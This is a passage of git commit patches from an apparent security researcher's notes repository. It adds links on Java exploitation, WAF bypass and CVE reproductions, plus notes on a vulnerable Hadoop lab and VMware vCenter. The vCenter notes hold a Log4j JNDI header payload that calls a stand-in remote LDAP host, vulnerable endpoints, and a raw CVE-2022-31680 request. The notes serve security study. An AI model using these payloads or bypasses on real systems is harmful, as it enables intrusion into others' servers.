"b/java\346\227\245\345\270\270/Readme.md" @@ -175,3 +175,4 @@ + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** ++ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** From b6f2ec66e83eb4a1d835b789d55e48c6feb4948b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Oct 2022 22:01:26 +0800 Subject: [PATCH 149/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 98eec1b..9267955 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -176,3 +176,4 @@ + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** ++ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** From cb24f175dd69d6140d74e1e42ae29b2850ef0bab Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Oct 2022 23:27:10 +0800 Subject: [PATCH 150/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9267955..cb7da58 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -177,3 +177,4 @@ + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** ++ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) From c22255f37bd0f93746997bc51c0308ea2a2aa4f4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 16 Oct 2022 12:43:47 +0800 Subject: [PATCH 151/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cb7da58..81a54e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -178,3 +178,4 @@ + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) ++ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** From 5b3bed1865a4acf8e139ed2934bdd08040b3f441 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 16 Oct 2022 23:10:53 +0800 Subject: [PATCH 152/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 81a54e9..39d0e80 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -179,3 +179,4 @@ + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** ++ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** From 20024f762022224471ecffd354624da5a4388f78 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 11:16:23 +0800 Subject: [PATCH 153/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 39d0e80..074b9c9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -180,3 +180,4 @@ + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** ++ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) From 2abd8cb5c6a37f7c80f5dad4e7ab771793ae6074 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 12:31:25 +0800 Subject: [PATCH 154/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 074b9c9..21508c7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -181,3 +181,4 @@ + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) ++ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) From b483a9f6d46bdb6f357d7f9cf9b1020650a2e69a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 22:56:42 +0800 Subject: [PATCH 155/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 21508c7..c4dd358 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -182,3 +182,4 @@ + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) ++ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From dbcc50a340f6532597a77a1ceb166baf99483320 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Oct 2022 00:01:36 +0800 Subject: [PATCH 156/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c4dd358..26584c0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -183,3 +183,4 @@ + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) From 614fade87eda619c49519b38ca8a18ef3fc09fc7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Oct 2022 08:37:53 +0800 Subject: [PATCH 157/332] Update README.md --- tomcat/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tomcat/README.md b/tomcat/README.md index 1747bb3..c38371f 100644 --- a/tomcat/README.md +++ b/tomcat/README.md @@ -3,3 +3,6 @@ Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 ![](./img/1.png) + + +[复现tomcat远程代码执行漏洞CVE-2016-8735](https://gv7.me/articles/2018/CVE-2016-8735/) From 65e60bdac9b270aec98bf27d298747e5368350cc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 20 Oct 2022 23:23:11 +0800 Subject: [PATCH 158/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 26584c0..514c97a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -184,3 +184,4 @@ + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) ++ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** From 5dfacecf58e66efb2be368053025c1f04571aad4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 00:22:39 +0800 Subject: [PATCH 159/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 0bc0205..7944b15 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -26,3 +26,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** ++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** From 3f0005fc0f5ab54ba4ea243fef3d9bf10b003b37 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 00:23:46 +0800 Subject: [PATCH 160/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 7944b15..63f06c2 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -27,3 +27,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** + 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** ++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** From 1a286e4e90f9fe6176a7431c5c88fe7f4836b434 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 16:02:35 +0800 Subject: [PATCH 161/332] Add files via upload --- .../chunked-coding-converter.md" | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 "java\346\227\245\345\270\270/chunked-coding-converter.md" diff --git "a/java\346\227\245\345\270\270/chunked-coding-converter.md" "b/java\346\227\245\345\270\270/chunked-coding-converter.md" new file mode 100644 index 0000000..4cd529f --- /dev/null +++ "b/java\346\227\245\345\270\270/chunked-coding-converter.md" @@ -0,0 +1,20 @@ +# chunked-coding-converter + +[唯快不破的分块传输绕WAF](https://mp.weixin.qq.com/s/pM1ULCqNdQwSB7hcltrbtw) + +[Bypass WAF HTTP协议覆盖+分块传输组合绕过](https://mp.weixin.qq.com/s/2DDYyvsZ5HIQC0qGMK9znQ) + +[利用分块传输吊打所有WAF](https://mp.weixin.qq.com/s/eDiiiVX4oF0LYG3Ia5P4mw) + +[技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) + +[编写Burp分块传输插件绕WAF](https://gv7.me/articles/2019/chunked-coding-converter/) + +[Java反序列化数据绕WAF之延时分块传输](https://gv7.me/articles/2021/java-deserialized-data-bypasses-waf-through-sleep-chunked/) + +``` +只有HTTP/1.1支持分块传输 +POST包都支持分块,不局限仅仅于反序列化和上传包 +Transfer-Encoding: chunked大小写不敏感 +``` + From ecc2b96cb605d519cbccd1e98b501572154224bb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 11:35:43 +0800 Subject: [PATCH 162/332] Create Readme.md --- hadoop/Readme.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 hadoop/Readme.md diff --git a/hadoop/Readme.md b/hadoop/Readme.md new file mode 100644 index 0000000..7e168b6 --- /dev/null +++ b/hadoop/Readme.md @@ -0,0 +1,21 @@ +# Hadoop + +[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA) + +[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd) + +[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/) + +[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/) + +## 环境搭建 + +org.apache.hadoop.yarn.util.resource.ResourceUtils + +``` +docker pull kpli0rn/hadoop-rpc-vuln:3.3.0 +docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0 +``` + From 537940ec5569abeb556ed3e1d398602f5f513971 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 15:36:02 +0800 Subject: [PATCH 163/332] Create Readme.md --- VMware vCenter/Readme.md | 92 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 VMware vCenter/Readme.md diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md new file mode 100644 index 0000000..f8ff54d --- /dev/null +++ b/VMware vCenter/Readme.md @@ -0,0 +1,92 @@ +# vcenter + +### 版本查看 + +``` +/sdk/vimServiceVersions.xml +``` + +### CVE-2021-21972 + +[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) + +[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U1c +VMware vCenter Server 6.7系列 < 6.7.U3l +VMware vCenter Server 6.5系列 < 6.5 U3n +VMware ESXi 7.0系列 < ESXi70U1c-17325551 +VMware ESXi 6.7系列 < ESXi670-202102401-SG +VMware ESXi 6.5系列 < ESXi650-202102101-SG +``` + +endpoint + +``` +/ui/vropspluginui/rest/services/uploadova +``` + +### CVE-2021-21985 + +[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U2b +VMware vCenter Server 6.7系列 < 6.7.U3n +VMware vCenter Server 6.5系列 < 6.5 U3p +VMware Cloud Foundation 4.x 系列 < 4.2.1 +VMware Cloud Foundation 4.x 系列 < 3.10.2.1 +``` + +### CVE-2021-22005 + +[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641) + +``` +VMware vCenter Server 7.0 +VMware vCenter Server 6.7 Running On Virtual Appliance +VMware Cloud Foundation (vCenter Server) 4.x +VMware Cloud Foundation (vCenter Server) 3.x +``` + +### Log4j + +endpoint + +``` +/websso/SAML2/SSO/vsphere.local?SAMLRequest= + +X-Forwarded-For: ${jndi:ldap://exp} +``` + + + +### CVE-2022-31680 + +[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587) + +``` +GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1 +Host: 192.168.0.109 +Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: application/json, text/plain, */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Pragma: no-cache +Isangularrequest: true +X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e +Referer: https://192.168.0.109/psc/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +``` + +### 后续利用 + +[VMware 